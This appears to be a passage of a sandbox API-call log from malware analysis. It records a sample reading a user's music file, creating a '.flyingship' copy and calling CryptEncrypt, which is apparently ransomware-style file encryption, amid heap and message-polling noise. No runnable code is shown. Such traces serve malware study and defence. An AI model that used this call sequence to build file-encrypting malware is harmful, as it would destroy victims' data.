lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0181.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.473] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0181.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0181.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0181.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0181.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0181.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0181.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0181.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0181.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0181.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0181.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0181.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0181.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0181.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0181.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0181.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0181.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\9zmv2.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0181.477] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.477] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0181.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0181.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0181.477] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0181.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0181.477] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.477] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0181.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0181.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0181.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.479] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.flyingship.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\9zmv2.flyingship.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0181.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0181.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0181.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0181.482] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0181.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.482] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.483] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0181.483] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0181.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0181.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0181.483] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0181.483] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xc44, lpOverlapped=0x0) returned 1 [0181.548] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0181.548] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.548] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0181.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0181.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0181.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc44) returned 0x900480 [0181.549] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0181.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0181.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0181.549] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.549] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0181.549] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.549] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.549] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0181.549] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.549] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0181.549] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.549] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.550] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0181.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.550] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2748, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2748*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0181.550] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.550] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.550] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.550] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.550] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0181.551] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.551] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.551] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.551] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.551] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.551] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.551] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.551] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xc44, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xc50) returned 1 